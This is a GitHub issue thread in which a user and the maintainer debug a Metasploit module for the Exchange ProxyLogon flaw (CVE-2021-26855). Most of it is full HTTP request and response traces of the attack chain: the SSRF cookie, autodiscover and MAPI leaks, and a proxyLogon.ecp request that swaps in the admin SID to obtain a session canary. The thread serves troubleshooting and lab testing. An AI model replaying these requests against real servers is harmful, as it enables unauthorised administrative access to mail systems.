Exploit aborted due to failure: not-found: No 'Client ID' was found #3

Closed
shodano opened this issue Mar 25, 2021 · 10 comments

Comments

@shodano commented Mar 25, 2021

Hello,
Had this error recently on this branch

Exploit aborted due to failure: not-found: No 'Client ID' was found

On the main branch it said it got an OAB error, though I think it's not related?

Any hints on where I should look?

@mekhalleh (Owner)

Please use set HttpTrace true and send me the result.

@mekhalleh (Owner)

Exploit aborted due to failure: not-found: No 'Client ID' was found

This can happen when you never logged into the mailboxes.

@shodano (Author) commented Mar 26, 2021

Edit:
After some ping-pong emails I got the <OABUrl>...</OABUrl> field (which brings me to the idea that my server is vulnerable?) in the XML response, but still the same error with the Client ID.


   Name              Current Setting           Required
   ----              ---------------           --------
   EMAIL             Administrator@serv.local
   METHOD            POST
   Proxies                                     no
   RHOSTS            10.0.1.114
   RPORT             443
   SRVHOST           0.0.0.0
   SRVPORT           8080
   SSL               true
   SSLCert                                     no
   URIPATH                                     no
   UseAlternatePath  false                     yes
   VHOST                                       no

   EXITFUNC          process                   yes
   LHOST             ....                      yes
   LPORT             4444                      yes



Exploit target:

   Id  Name
   --  ----
   2   Windows Command

####################

Request:

####################

POST /ecp/W.js HTTP/1.1
Host: 10.0.1.114
User-Agent: Mozilla/5.0
Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

####################

Response:

####################

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
request-id: e260be1f-b500-492b-8a90-35c12e0fd202
X-CalculatedBETarget: localhost
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-FEServer: MX2016-SERV
Date: Fri, 26 Mar 2021 07:54:12 GMT
Content-Length: 85

####################

Request:

####################

RPC_IN_DATA /rpc/rpcproxy.dll HTTP/1.1
Host: 10.0.1.114
User-Agent: Mozilla/5.0
Authorization: NTLM *****
Content-Length: 0

####################

Response:

####################

HTTP/1.1 401 Unauthorized
Server: Microsoft-IIS/10.0
request-id: 71cc4233-fe3e-44a9-af1c-884425feddc2
WWW-Authenticate: NTLM  *****, Negotiate, Basic realm="10.0.1.114"
Date: Fri, 26 Mar 2021 07:54:12 GMT
Content-Length: 0

[*] Internal server name (mx2016-serv.serv.local)
[*] https://10.0.1.114:443 - Sending autodiscover request
####################

Request:

####################

POST /ecp/bef.js HTTP/1.1
Host: 10.0.1.114
User-Agent: Mozilla/5.0
Cookie: X-BEResource=[:[@mx2016-serv.serv.local/autodiscover/autodiscover.xml?a=~2033364721;
Content-Type: text/xml; charset=utf-8
Content-Length: 376

<?xml version="1.0" encoding="utf-8"?>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
  <Request>
    <EMailAddress>Administrator@serv.local</EMailAddress>
    <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
  </Request>
</Autodiscover>

####################

Response:

####################

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/10.0
request-id: a74a3600-136a-4226-aded-b44f58d9e8fa
X-CalculatedBETarget: mx2016-serv.serv.local, mx2016-serv.serv.local
X-DiagInfo: MX2016-SERV
X-BEServer: MX2016-SERV
X-FEServer: MX2016-SERV, MX2016-SERV
X-AspNet-Version: 4.0.30319
Set-Cookie: X-BackEndCookie=S-1-5-18=rJqNiZqNgbKnzc/OydKsuq2p0YyajYnRk5CcnpOBzsbLzc/JzcjJxoHNz83O0s/M0s3Jq8/Hxc/Lxc7N; expires=Fri, 26-Mar-2021 08:04:12 GMT; path=/autodiscover; secure; HttpOnly
X-Powered-By: ASP.NET
Date: Fri, 26 Mar 2021 07:54:12 GMT
Content-Length: 3743
<?xml version="1.0" encoding="utf-8"?>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/responseschema/2006">
  <Response xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
    <User>
      <DisplayName>Administrator</DisplayName>
      <LegacyDN>/o=SERV/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=d4011f9f71f7479799c62d25ab8c21f2-Administrator</LegacyDN>
      <AutoDiscoverSMTPAddress>Administrator@serv.local</AutoDiscoverSMTPAddress>
      <DeploymentId>b833b524-b798-4fb2-88ad-b9c3588559b8</DeploymentId>
    </User>
    <Account>
      <AccountType>email</AccountType>
      <Action>settings</Action>
      <MicrosoftOnline>False</MicrosoftOnline>
      <Protocol>
        <Type>EXCH</Type>
        <Server>cc96ea88-1aba-4dbe-8df8-7ad1b36c1349@serv.local</Server>
        <ServerDN>/o=SERV/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=cc96ea88-1aba-4dbe-8df8-7ad1b36c1349@serv.local</ServerDN>
        <ServerVersion>73C186B1</ServerVersion>
        <MdbDN>/o=SERV/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=cc96ea88-1aba-4dbe-8df8-7ad1b36c1349@serv.local/cn=Microsoft Private MDB</MdbDN>
        <PublicFolderServer>mx2016-serv.serv.local</PublicFolderServer>
        <AD>DC-1.serv.local</AD>
        <ASUrl>https://mx2016-serv.serv.local/EWS/Exchange.asmx</ASUrl>
        <EwsUrl>https://mx2016-serv.serv.local/EWS/Exchange.asmx</EwsUrl>
        <EmwsUrl>https://mx2016-serv.serv.local/EWS/Exchange.asmx</EmwsUrl>
        <EcpUrl>https://mx2016-serv.serv.local/owa/</EcpUrl>
        <EcpUrl-um>?path=/options/callanswering</EcpUrl-um>
        <EcpUrl-aggr>?path=/options/connectedaccounts</EcpUrl-aggr>
        <EcpUrl-mt>options/ecp/PersonalSettings/DeliveryReport.aspx?rfr=olk&amp;exsvurl=1&amp;IsOWA=&lt;IsOWA&gt;&amp;MsgID=&lt;MsgID&gt;&amp;Mbx=&lt;Mbx&gt;&amp;realm=serv.local</EcpUrl-mt>
        <EcpUrl-ret>?path=/options/retentionpolicies</EcpUrl-ret>
        <EcpUrl-sms>?path=/options/textmessaging</EcpUrl-sms>
        <EcpUrl-photo>?path=/options/myaccount/action/photo</EcpUrl-photo>
        <EcpUrl-tm>options/ecp/?rfr=olk&amp;ftr=TeamMailbox&amp;exsvurl=1&amp;realm=serv.local</EcpUrl-tm>
        <EcpUrl-tmCreating>options/ecp/?rfr=olk&amp;ftr=TeamMailboxCreating&amp;SPUrl=&lt;SPUrl&gt;&amp;Title=&lt;Title&gt;&amp;SPTMAppUrl=&lt;SPTMAppUrl&gt;&amp;exsvurl=1&amp;realm=serv.local</EcpUrl-tmCreating>
        <EcpUrl-tmEditing>options/ecp/?rfr=olk&amp;ftr=TeamMailboxEditing&amp;Id=&lt;Id&gt;&amp;exsvurl=1&amp;realm=serv.local</EcpUrl-tmEditing>
        <EcpUrl-extinstall>?path=/options/manageapps</EcpUrl-extinstall>
        <OOFUrl>https://mx2016-serv.serv.local/EWS/Exchange.asmx</OOFUrl>
        <UMUrl>https://mx2016-serv.serv.local/EWS/UM2007Legacy.asmx</UMUrl>
        <ServerExclusiveConnect>off</ServerExclusiveConnect>
      </Protocol>
      <Protocol>
        <Type>EXPR</Type>
        <Server>mx2016-serv.serv.local</Server>
        <SSL>Off</SSL>
        <AuthPackage>Ntlm</AuthPackage>
        <ServerExclusiveConnect>on</ServerExclusiveConnect>
        <CertPrincipalName>None</CertPrincipalName>
        <GroupingInformation>Default-First-Site-Name</GroupingInformation>
      </Protocol>
      <Protocol>
        <Type>WEB</Type>
        <Internal>
          <OWAUrl AuthenticationMethod="Basic, Fba">https://mx2016-serv.serv.local/owa/</OWAUrl>
          <Protocol>
            <Type>EXCH</Type>
            <ASUrl>https://mx2016-serv.serv.local/EWS/Exchange.asmx</ASUrl>
          </Protocol>
        </Internal>
      </Protocol>
    </Account>
  </Response>
</Autodiscover>

[-] Exploit aborted due to failure: not-found: No 'Client ID' was found
[*] Exploit completed, but no session was created.

@mekhalleh (Owner)

Thanks for the reply. I removed the ClientID because I don't think it is useful for getting the RCE.

@shodano (Author) commented Mar 26, 2021

OK, I didn't know that.
Also, a new error, a bit off-topic, but worthwhile if you can explain why, just to help others if they encounter this:

[Screenshot from 2021-03-26 13-59-52]

@mekhalleh (Owner)

Send me the HttpTrace please, because I need to read that.

@shodano (Author) commented Mar 26, 2021

I will update with the full HttpTrace asap.
For now I've noticed that:

The response for POST /ecp/Lf.js HTTP/1.1 (the one with the <AcceptableResponseSchema>) comes with a parameter in the header: Set-Cookie: X-BackEndCookie=S-1-5-18 ... which I've read is local admin.

After the second POST /ecp/Lf.js HTTP/1.1, with the LegacyDN this time, the response comes with:

Microsoft.Exchange.RpcClientAccess.Server.LoginPermException: 'User SID: S-1-5-18' can't act as owner of a UserMailbox object '[LegacyDN]' with SID S-1-5-21-.... and MasterAccountSid (StoreError=LoginPerm)

SID S-1-5-21 is for Domain Admin
And I think that's the problem, the cookies should be set to S-1-5-21?

@mekhalleh (Owner)

This is what I know:

Seems to be the same mistake as: rapid7/metasploit-framework#14860 (comment)

...
[*]  * ASP.NET_SessionId: 017dae4e-8361-442b-9618-e3cc451e25ca
[*]  * msExchEcpCanary: XNknKMc-Z0ONdL_BNRyWUZqK3cfw6dgIwsx8-_e3l7dLfMONGiwSSHT6PlXW3uVcGG_u3TAnCNo.
####################
# Request:
####################
POST /ecp/oCb.js HTTP/1.1
Host: <redacted>
User-Agent: Mozilla/5.0
Cookie: X-BEResource=Admin@SRV02:444/ecp/DDI/DDIService.svc/GetList?reqId=1615583487987&schema=VirtualDirectory&msExchEcpCanary=XNknKMc-Z0ONdL_BNRyWUZqK3cfw6dgIwsx8-_e3l7dLfMONGiwSSHT6PlXW3uVcGG_u3TAnCNo.&a=~1942062522; ASP.NET_SessionId=017dae4e-8361-442b-9618-e3cc451e25ca; msExchEcpCanary=XNknKMc-Z0ONdL_BNRyWUZqK3cfw6dgIwsx8-_e3l7dLfMONGiwSSHT6PlXW3uVcGG_u3TAnCNo.;
msExchLogonMailbox: S-1-5-21-<redacted>-<redacted>-<redacted>-500
msExchTargetMailbox: S-1-5-21-<redacted>-<redacted>-<redacted>-1113
msExchLogonAccount: /o=ExchangeLab/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=536cfe04ed60470a9a06efe4dfceebf6-Domain admin
Content-Type: application/json; charset=utf-8
Content-Length: 159

{"filter":{"Parameters":{"__type":"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel","SelectedView":"","SelectedVDirType":"OAB"}},"sort":{}}
####################
# Response:
####################
HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/10.0
request-id: 7176d4b8-373c-4d59-82a8-0d5e24058ff8
X-CalculatedBETarget: srv02
X-Content-Type-Options: nosniff
X-ECP-ERROR: Microsoft.Exchange.Configuration.Authorization.CmdletAccessDeniedException
jsonerror: true
X-DiagInfo: SRV02
X-BEServer: SRV02
X-UA-Compatible: IE=10
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-FEServer: SRV02
Date: Tue, 16 Mar 2021 09:32:42 GMT
Content-Length: 2125

{"Message":"Your request couldn't be completed. Please try again, and if the problem persists, contact your administrator.","ExceptionDetail":{"HelpLink":null,"InnerException":null,"Message":"You don't have permission to open this page. If you're a new user or were recently assigned credentials, please wait 15 minutes and try again.","StackTrace":"   at Microsoft.Exchange.Management.DDIService.CmdletActivity.IsRunnable(DataRow input, DataTable dataTable, DataObjectStore store)\u000d\u000a   at Microsoft.Exchange.Management.DDIService.BranchActivity.Run(DataRow input, DataTable dataTable, DataObjectStore store, Type codeBehind, UpdateTableDelegate updateTableDelegate)\u000d\u000a   at Microsoft.Exchange.Management.DDIService.Workflow.Run(DataRow input, DataTable dataTable, DataObjectStore store, Type codeBehind, UpdateTableDelegate updateTableDelegate)\u000d\u000a   at Microsoft.Exchange.Management.DDIService.WSListDataHandler.ExecuteCore(Workflow workflow)\u000d\u000a   at Microsoft.Exchange.Management.DDIService.WSDataHandler.Execute()\u000d\u000a   at Microsoft.Exchange.Management.DDIService.DDIServiceHelper.GetListCommon(DDIParameters filter, SortOptions sort, Boolean forGetProgress)\u000d\u000a   at Microsoft.Exchange.Management.DDIService.DDIService.GetList(DDIParameters filter, SortOptions sort)\u000d\u000a   at SyncInvokeGetList(Object , Object[] , Object[] )\u000d\u000a   at System.ServiceModel.Dispatcher.SyncMethodInvoker.Invoke(Object instance, Object[] inputs, Object[]& outputs)\u000d\u000a   at System.ServiceModel.Dispatcher.DispatchOperationRuntime.InvokeBegin(MessageRpc& rpc)\u000d\u000a   at System.ServiceModel.Dispatcher.ImmutableDispatchRuntime.ProcessMessage5(MessageRpc& rpc)\u000d\u000a   at System.ServiceModel.Dispatcher.ImmutableDispatchRuntime.ProcessMessage11(MessageRpc& rpc)\u000d\u000a   at System.ServiceModel.Dispatcher.MessageRpc.Process(Boolean 
isOperationContextSet)","Type":"Microsoft.Exchange.Configuration.Authorization.CmdletAccessDeniedException"},"ExceptionType":"Microsoft.Exchange.Configuration.Authorization.CmdletAccessDeniedException","StackTrace":null}
[-] Exploit aborted due to failure: unknown: No 'OAB Id' was found
[*] Exploit completed, but no session was created.

On the Rapid7 lab this was not working, but I ended up correcting this by playing with the SID (rapid7/metasploit-framework#14860 (comment)).

####################
# Request:
####################
POST /ecp/ExC.js HTTP/1.1
Host: <redacted>
User-Agent: Mozilla/5.0
Cookie: X-BEResource=Admin@SRV04:444/ecp/proxyLogon.ecp?a=~1942062522;
msExchLogonMailbox: S-1-5-21-<redacted>-<redacted>-<redacted>-500
msExchTargetMailbox: S-1-5-21-<redacted>-<redacted>-<redacted>-500
Content-Type: text/xml; charset=utf-8
Content-Length: 91

<r at="Negotiate" ln="TestUserDA"><s>S-1-5-21-<redacted>-<redacted>-<redacted>-1113</s></r>
####################
# Response:
####################
HTTP/1.1 241
Cache-Control: private
Server: Microsoft-IIS/8.5
request-id: 48b24cbd-b46f-482a-a52a-3232cced0b2e
X-CalculatedBETarget: srv04
X-Content-Type-Options: nosniff
X-DiagInfo: SRV04
X-BEServer: SRV04
X-UA-Compatible: IE=10
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=57df27a1-5a76-4fb4-9eb9-54c61d946058; path=/; secure; HttpOnly, msExchEcpCanary=f4tPXZALuUSKRDt4Ss4K4RhRqmiC69gIogOzyRK_aIYvxRFWMmng3nsNaCFMy7chn9i7FIevbfc.; path=/ecp
X-Powered-By: ASP.NET
X-FEServer: SRV04
Date: Thu, 18 Mar 2021 09:27:40 GMT
Content-Length: 0

The official module is always the one that was added in Metasploit (in the master branch https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/exchange_proxylogon_rce.rb)

But you are telling me that this one does not work? Can you confirm?

Is it that there is something missing in the request to proxyLogon.ecp to obtain the elevation?

And to make things more difficult, I cannot reproduce this case in my lab. But maybe you can share yours?

This is what it gives on my lab (full trace):

msf6 exploit(windows/http/exchange_proxylogon_rce) > run

[*] Executing automatic check (disable AutoCheck to override)
[*] Using auxiliary/scanner/http/exchange_proxylogon as check
####################
# Request:
####################
POST /ecp/W.js HTTP/1.1
Host: 172.20.2.110
User-Agent: Mozilla/5.0
Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


####################
# Response:
####################
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
request-id: e0be217e-cda3-4904-a5a3-4de3a818a99f
Set-Cookie: ClientId=NSXDMSHGKIOXJHJQIELOQ; expires=Sat, 26-Mar-2022 17:30:47 GMT; path=/; HttpOnly
X-CalculatedBETarget: localhost
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-FEServer: LAB-AD01
Date: Fri, 26 Mar 2021 17:30:47 GMT
Content-Length: 85

NegotiateSecurityContext failed with for host 'localhost' with status 'TargetUnknown'
[+] https://172.20.2.110:443 - The target is vulnerable to CVE-2021-26855.
[*] Scanned 1 of 1 hosts (100% complete)
[+] The target is vulnerable.
[*] https://172.20.2.110:443 - Attempt to exploit for CVE-2021-26855
[*] https://172.20.2.110:443 - Retrieving backend FQDN over RPC request
####################
# Request:
####################
RPC_IN_DATA /rpc/rpcproxy.dll HTTP/1.1
Host: 172.20.2.110
User-Agent: Mozilla/5.0
Authorization: NTLM TlRMTVNTUAABAAAABQKIoAAAAAAAAAAAAAAAAAAAAAA=
Content-Length: 0


####################
# Response:
####################
HTTP/1.1 401 Unauthorized
Server: Microsoft-IIS/8.5
request-id: 58ab1ea2-bceb-42d5-aad1-49ccfbf02309
Set-Cookie: ClientId=X0R0ZSF0KNDAJCEQ; expires=Sat, 26-Mar-2022 17:30:47 GMT; path=/; HttpOnly
WWW-Authenticate: NTLM TlRMTVNTUAACAAAACgAKADgAAAAFAomigy0Phw8IdbAAAAAAAAAAAIYAhgBCAAAABgOAJQAAAA9QAFcATgBFAEQAAgAKAFAAVwBOAEUARAABABAATABBAEIALQBBAEQAMAAxAAQAEgBwAHcAbgBlAGQALgBsAGEAYgADACQATABBAEIALQBBAEQAMAAxAC4AcAB3AG4AZQBkAC4AbABhAGIABQASAHAAdwBuAGUAZAAuAGwAYQBiAAcACAAogSnCZSLXAQAAAAA=, Negotiate, Basic realm="172.20.2.110"
X-Powered-By: ASP.NET
X-FEServer: LAB-AD01
Date: Fri, 26 Mar 2021 17:30:47 GMT
Content-Length: 0


[*] Internal server name (lab-ad01.pwned.lab)
[*] https://172.20.2.110:443 - Sending autodiscover request
####################
# Request:
####################
POST /ecp/SNu.js HTTP/1.1
Host: 172.20.2.110
User-Agent: Mozilla/5.0
Cookie: X-BEResource=[:[@lab-ad01.pwned.lab/autodiscover/autodiscover.xml?a=~2070661181;
Content-Type: text/xml; charset=utf-8
Content-Length: 376

<?xml version="1.0" encoding="utf-8"?>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
  <Request>
    <EMailAddress>gaston.lagaffe@pwned.lab</EMailAddress>
    <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
  </Request>
</Autodiscover>

####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/8.5
request-id: 58a1b436-b737-4bbb-86be-0cbef8e238f4
Set-Cookie: ClientId=IOZXAQS9KECJNCKZVHQQ; expires=Sat, 26-Mar-2022 17:30:47 GMT; path=/; HttpOnly, X-BackEndCookie=S-1-5-18=rJqNiZqNgbO+vdK+u8/O0Y+IkZqb0ZOenYHOxsvOxsbIz87Igc3Pzc7Sz8zSzcmrzsjFy8/Fy8g=; expires=Fri, 26-Mar-2021 17:40:47 GMT; path=/autodiscover; secure; HttpOnly
X-CalculatedBETarget: lab-ad01.pwned.lab, lab-ad01.pwned.lab
X-DiagInfo: LAB-AD01
X-BEServer: LAB-AD01
X-FEServer: LAB-AD01, LAB-AD01
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 26 Mar 2021 17:30:47 GMT
Content-Length: 4117

<?xml version="1.0" encoding="utf-8"?>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/responseschema/2006">
  <Response xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
    <User>
      <DisplayName>Gaston LAGAFFE</DisplayName>
      <LegacyDN>/o=Pwned Lab2k13/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=5c9b77b49e5d4996a66ad6276a4955d9-Gaston LAG</LegacyDN>
      <AutoDiscoverSMTPAddress>gaston.lagaffe@pwned.lab</AutoDiscoverSMTPAddress>
      <DeploymentId>ee782f37-2118-4c07-96a4-7f6ae4494b29</DeploymentId>
    </User>
    <Account>
      <AccountType>email</AccountType>
      <Action>settings</Action>
      <MicrosoftOnline>False</MicrosoftOnline>
      <Protocol>
        <Type>EXCH</Type>
        <Server>98ebc2b9-189b-487c-9398-59092f58bd9f@pwned.lab</Server>
        <ServerDN>/o=Pwned Lab2k13/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=98ebc2b9-189b-487c-9398-59092f58bd9f@pwned.lab</ServerDN>
        <ServerVersion>73C085D9</ServerVersion>
        <MdbDN>/o=Pwned Lab2k13/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=98ebc2b9-189b-487c-9398-59092f58bd9f@pwned.lab/cn=Microsoft Private MDB</MdbDN>
        <PublicFolderServer>lab-ad01.pwned.lab</PublicFolderServer>
        <AD>LAB-AD01.pwned.lab</AD>
        <ASUrl>https://lab-ad01.pwned.lab/EWS/Exchange.asmx</ASUrl>
        <EwsUrl>https://lab-ad01.pwned.lab/EWS/Exchange.asmx</EwsUrl>
        <EmwsUrl>https://lab-ad01.pwned.lab/EWS/Exchange.asmx</EmwsUrl>
        <EcpUrl>https://lab-ad01.pwned.lab/ecp/</EcpUrl>
        <EcpUrl-um>?rfr=olk&amp;p=customize/voicemail.aspx&amp;exsvurl=1&amp;realm=pwned.lab</EcpUrl-um>
        <EcpUrl-aggr>?rfr=olk&amp;p=personalsettings/EmailSubscriptions.slab&amp;exsvurl=1&amp;realm=pwned.lab</EcpUrl-aggr>
        <EcpUrl-mt>PersonalSettings/DeliveryReport.aspx?rfr=olk&amp;exsvurl=1&amp;IsOWA=&lt;IsOWA&gt;&amp;MsgID=&lt;MsgID&gt;&amp;Mbx=&lt;Mbx&gt;&amp;realm=pwned.lab</EcpUrl-mt>
        <EcpUrl-ret>?rfr=olk&amp;p=organize/retentionpolicytags.slab&amp;exsvurl=1&amp;realm=pwned.lab</EcpUrl-ret>
        <EcpUrl-sms>?rfr=olk&amp;p=sms/textmessaging.slab&amp;exsvurl=1&amp;realm=pwned.lab</EcpUrl-sms>
        <EcpUrl-publish>customize/calendarpublishing.slab?rfr=olk&amp;exsvurl=1&amp;FldID=&lt;FldID&gt;&amp;realm=pwned.lab</EcpUrl-publish>
        <EcpUrl-photo>PersonalSettings/EditAccount.aspx?rfr=olk&amp;chgPhoto=1&amp;exsvurl=1&amp;realm=pwned.lab</EcpUrl-photo>
        <EcpUrl-tm>?rfr=olk&amp;ftr=TeamMailbox&amp;exsvurl=1&amp;realm=pwned.lab</EcpUrl-tm>
        <EcpUrl-tmCreating>?rfr=olk&amp;ftr=TeamMailboxCreating&amp;SPUrl=&lt;SPUrl&gt;&amp;Title=&lt;Title&gt;&amp;SPTMAppUrl=&lt;SPTMAppUrl&gt;&amp;exsvurl=1&amp;realm=pwned.lab</EcpUrl-tmCreating>
        <EcpUrl-tmEditing>?rfr=olk&amp;ftr=TeamMailboxEditing&amp;Id=&lt;Id&gt;&amp;exsvurl=1&amp;realm=pwned.lab</EcpUrl-tmEditing>
        <EcpUrl-extinstall>Extension/InstalledExtensions.slab?rfr=olk&amp;exsvurl=1&amp;realm=pwned.lab</EcpUrl-extinstall>
        <OOFUrl>https://lab-ad01.pwned.lab/EWS/Exchange.asmx</OOFUrl>
        <UMUrl>https://lab-ad01.pwned.lab/EWS/UM2007Legacy.asmx</UMUrl>
        <ServerExclusiveConnect>off</ServerExclusiveConnect>
      </Protocol>
      <Protocol>
        <Type>EXPR</Type>
        <Server>lab-ad01.pwned.lab</Server>
        <SSL>Off</SSL>
        <AuthPackage>Ntlm</AuthPackage>
        <ServerExclusiveConnect>on</ServerExclusiveConnect>
        <CertPrincipalName>None</CertPrincipalName>
        <GroupingInformation>Default-First-Site-Name</GroupingInformation>
      </Protocol>
      <Protocol>
        <Type>WEB</Type>
        <Internal>
          <OWAUrl AuthenticationMethod="Basic, Fba">https://lab-ad01.pwned.lab/owa/</OWAUrl>
          <Protocol>
            <Type>EXCH</Type>
            <ASUrl>https://lab-ad01.pwned.lab/EWS/Exchange.asmx</ASUrl>
          </Protocol>
        </Internal>
      </Protocol>
    </Account>
  </Response>
</Autodiscover>
[*] Server: 98ebc2b9-189b-487c-9398-59092f58bd9f@pwned.lab
[*] LegacyDN: /o=Pwned Lab2k13/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=5c9b77b49e5d4996a66ad6276a4955d9-Gaston LAG
[*] https://172.20.2.110:443 - Sending mapi request
####################
# Request:
####################
POST /ecp/SNu.js HTTP/1.1
Host: 172.20.2.110
User-Agent: Mozilla/5.0
Cookie: X-BEResource=[:[@lab-ad01.pwned.lab:444/mapi/emsmdb?MailboxId=98ebc2b9-189b-487c-9398-59092f58bd9f@pwned.lab&a=~2065407810;
X-RequestType: Connect
X-ClientInfo: {1AA18248-910B-3423-442E-CB6E06BF0F7E}
X-ClientApplication: Outlook/15.0.4815.1002
X-RequestId: {437CBADF-0ACD-6290-C02F-D6503968A46F}:38938
Content-Type: application/mapi-http
Content-Length: 149

/o=Pwned Lab2k13/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=5c9b77b49e5d4996a66ad6276a4955d9-Gaston LAG [followed by binary MAPI Connect fields, not reproducible as text]
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/mapi-http
Server: Microsoft-IIS/8.5
request-id: 502e64ff-b7f7-47b6-9632-375d1ae885e8
Set-Cookie: ClientId=EGLTLLPUOLAQXHPV0Q; expires=Sat, 26-Mar-2022 17:30:47 GMT; path=/; HttpOnly, MapiContext=MAPIAAAAAOmo6seGwvLD4NLi0OHM/M/i0ObG98D6yPrA8MGbuIm6iL+NvYm+j7sQAAAAAAAAAA==; path=/mapi/emsmdb; secure; HttpOnly, MapiSequence=0-b8roYg==; path=/mapi/emsmdb; secure; HttpOnly
X-CalculatedBETarget: lab-ad01.pwned.lab
X-ServerApplication: Exchange/15.00.1497.000
X-RequestId: {437CBADF-0ACD-6290-C02F-D6503968A46F}:38938
X-ClientInfo: {1AA18248-910B-3423-442E-CB6E06BF0F7E}
X-RequestType: Connect
X-TunnelExpirationTime: 1800000
X-PendingPeriod: 30000
X-ExpirationInfo: 900000
X-ResponseCode: 0
X-DiagInfo: LAB-AD01
X-BEServer: LAB-AD01
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-FEServer: LAB-AD01
Date: Fri, 26 Mar 2021 17:30:47 GMT
Content-Length: 1128

PROCESSING
DONE
X-StartTime: Fri, 26 Mar 2021 17:30:47 GMT
X-ElapsedTime: 15

[binary MAPI response data] ClientAccessServer=LAB-AD01.pwned.lab,ConnectTime=26/03/2021 21:30:47,ConnectionID=17

Microsoft.Exchange.RpcClientAccess.Server.LoginPermException: 'User SID: S-1-5-18' can't act as owner of a UserMailbox object '/o=Pwned Lab2k13/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=5c9b77b49e5d4996a66ad6276a4955d9-Gaston LAG' with SID S-1-5-21-3876225949-3666446388-246247518-1140 and MasterAccountSid  (StoreError=LoginPerm)
   at Microsoft.Exchange.RpcClientAccess.Server.UserManager.User.CorrelateIdentityWithLegacyDN(ClientSecurityContext clientSecurityContext)
   at Microsoft.Exchange.RpcClientAccess.Server.RpcDispatch.<>c__DisplayClassc.<Connect>b__8()
   at Microsoft.Exchange.RpcClientAccess.Server.RpcDispatch.ExecuteWrapper(Func`1 getExecuteParameters, Func`1 executeDelegate, Action`1 exceptionSerializationDelegate)
[*] SID: S-1-5-21-3876225949-3666446388-246247518-1140 (gaston.lagaffe@pwned.lab)
[*] https://172.20.2.110:443 - Sending ProxyLogon request
[*] Try to get a good msExchCanary (by patching user SID method)
####################
# Request:
####################
POST /ecp/SNu.js HTTP/1.1
Host: 172.20.2.110
User-Agent: Mozilla/5.0
Cookie: X-BEResource=[:[@lab-ad01.pwned.lab:444/ecp/proxyLogon.ecp?a=~2089338109;
msExchLogonMailbox: S-1-5-21-3876225949-3666446388-246247518-500
msExchTargetMailbox: S-1-5-21-3876225949-3666446388-246247518-500
Content-Type: text/xml; charset=utf-8
Content-Length: 93

<r at="Negotiate" ln="gaston.lagaffe"><s>S-1-5-21-3876225949-3666446388-246247518-500</s></r>
####################
# Response:
####################
HTTP/1.1 241
Cache-Control: private
Server: Microsoft-IIS/8.5
request-id: f6df0b16-d018-4295-b334-52ef9bfdee00
Set-Cookie: ClientId=KFAYSEOGHUOHNMYBJBBG; expires=Sat, 26-Mar-2022 17:30:47 GMT; path=/; HttpOnly, ASP.NET_SessionId=add16fb3-f7c7-4aa8-a2de-63bc2199acdb; path=/; HttpOnly, msExchEcpCanary=cROKk7ES8k2z7ADPHMSSM8MxuTkP8tgI1jXMCwS47YR8ZCV2iiiwjAvkWt3NcwpSIeghnLZYJSI.; path=/ecp
X-CalculatedBETarget: lab-ad01.pwned.lab
X-Content-Type-Options: nosniff
X-DiagInfo: LAB-AD01
X-BEServer: LAB-AD01
X-UA-Compatible: IE=10
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-FEServer: LAB-AD01
Date: Fri, 26 Mar 2021 17:30:47 GMT
Content-Length: 0


####################
# Request:
####################
POST /ecp/SNu.js HTTP/1.1
Host: 172.20.2.110
User-Agent: Mozilla/5.0
